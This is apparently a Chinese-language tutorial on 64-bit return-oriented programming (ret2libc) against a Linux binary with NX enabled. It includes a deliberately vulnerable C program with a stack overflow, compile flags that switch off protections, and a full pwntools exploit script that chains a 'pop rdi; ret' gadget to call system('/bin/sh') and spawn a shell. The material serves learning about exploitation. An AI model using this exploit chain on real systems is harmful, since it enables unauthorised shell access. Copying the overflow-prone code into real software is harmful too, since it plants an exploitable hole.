上回弄了个32位的NX机制及策略-Ret2libc,这次弄一个64位的

将代码在x64平台上编译运行，不同于x86，x64平台前六个整型或指针参数依次保存在RDI, RSI, RDX, RCX, R8和R9寄存器里，如果还有更多的参数的话才会保存在栈上

也就是说按之前的想法调用system函数，参数是/bin/sh的话,我们要想办法在栈布局时，先将/bin/sh传给rdi寄存器，再调用sytem函数

一，ROP

ROP(Return Oriented Programming)即面向返回地址编程，其主要思想是在栈缓冲区溢出的基础上，通过利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值，从而改变程序的执行流程，达到预期利用目的。

1.假设现有一个存在有栈溢出漏洞的栈空间布局如下：

2.我们通过布局，改变为：

①gadget_addr指向的是程序中可以利用的小片段代码，这里使用的是pop rdi ; ret ;
对于这种搜索，我们可以使用一个工具：ROPgadget

安装
$ git clone -b master git@github.com:JonathanSalwan/ROPgadget.git
$ cd ROPgadget
$ cd ./dependencies/capstone-next
$ ./make.sh
$ sudo ./make.sh install
$ cd ./bindings/python
$ make
$ sudo make install

②bin_sh_addr指向的是字符串参数:'/bin/sh'

③system_addr则指向system函数

3.布局说明

①当程序运行到gadget_addr时（rsp指向gadget_addr），接下来会跳转到小片段里执行命令，同时rsp+8(rsp指向bin_sh_addr)

②然后执行pop rdi,将bin_sh_addr弹入rdi寄存器中，同时rsp + 8(rsp指向system_addr)

③执行return指令，因为这时rsp是指向system_addr的，这时就会调用system函数，而参数是通过rdi传递的，也就是会将/bin/sh传入，从而实现调用system('/bin/sh')

二，测试

1，源码

文件名：StackOF.c

#include <stdio.h>
#include <string.h>

void vul(char *msg)
{
   char buffer[64];
   memcpy(buffer,msg,128);
   return;
}

int main()
{
   puts("So plz give me your shellcode:");
   char buffer[256];
   memset(buffer,0,256);
   read(0,buffer,256);
   vul(buffer);
   return 0;
}
   

2.编译

gcc -g -ggdb -fno-stack-protector -no-pie StackOF.c -o pwnme

3.查看属性及保护措施

64位文件，NX开启

4.查看加载的libc文件及地址

ldd pwnme

得到libc版本为：libc.so.6
libc的加载地址libc_base = x00007ffff7dee000
同时将libc.so.6拷贝到pwnme同级目录

cp /lib/x86_64-linux-gnu/libc.so.6 你的目录

5.代码

文件名：exp.py

from pwn import *

p = process('./pwnme')
p.recvuntil("shellcode:")

elf = ELF('libc.so.6')

system_in_libc = elf.symbols['system']                  #system在libc文件里的偏移地址
#print hex(system_in_libc)  
bin_sh_in_libc = next(elf.search('/bin/sh'))            #/'bin/sh'字符串在libc里的偏移地址
#print hex(bin_sh_in_libc)

libc_base = 0x00007ffff7dee000                        #libc加载的基址
gadget_addr =  0x0000000000401243                     #搜索到的gadget片段的地址
system_addr = libc_base + system_in_libc              #system在程序里的地址
bin_sh_addr = libc_base + bin_sh_in_libc                #/bin/sh在程序里的地址

print hex(system_addr) +'----'+hex(bin_sh_addr)

#布局
buf = 'A'*72                                                 #如何得到填充数据大小：https://www.jianshu.com/p/278f8d1f8322
buf += p64(gadget_addr)
buf += p64(bin_sh_addr)
buf += p64(system_addr)

with open('poc','wb') as f :
    f.write(buf)

p.sendline(buf)                                                  #开始溢出
p.interactive()

6.运行

python exp.py 

输入whoami返回root,溢出成功！！！测试完成！！！